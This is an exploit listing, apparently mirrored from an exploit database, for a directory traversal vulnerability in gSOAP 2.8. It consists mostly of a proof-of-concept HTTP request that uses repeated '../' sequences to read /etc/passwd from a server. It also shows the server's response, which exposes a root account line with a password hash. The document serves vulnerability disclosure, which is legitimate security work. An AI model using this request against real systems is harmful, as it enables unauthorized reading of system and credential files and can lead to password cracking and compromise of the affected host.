Exploit for gSOAP 2.8 Directory Traversal

## https://sploitus.com/exploit?id=PACKETSTORM:155300
# Title: gSOAP 2.8 - Directory Traversal  
# Author: Numan Türle  
# Date: 2019-11-13  
# Vendor Homepage: https://www.genivia.com/  
# Version : gSOAP 2.8  
# Software Link : https://www.genivia.com/products.html#gsoap  
  
  
POC  
---------  
  
GET /../../../../../../../../../etc/passwd HTTP/1.1  
Host: 10.200.106.101  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
Response  
---------  
HTTP/1.1 200 OK  
Server: gSOAP/2.8  
Content-Type: application/octet-stream  
Content-Length: 51  
Connection: close  
  
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh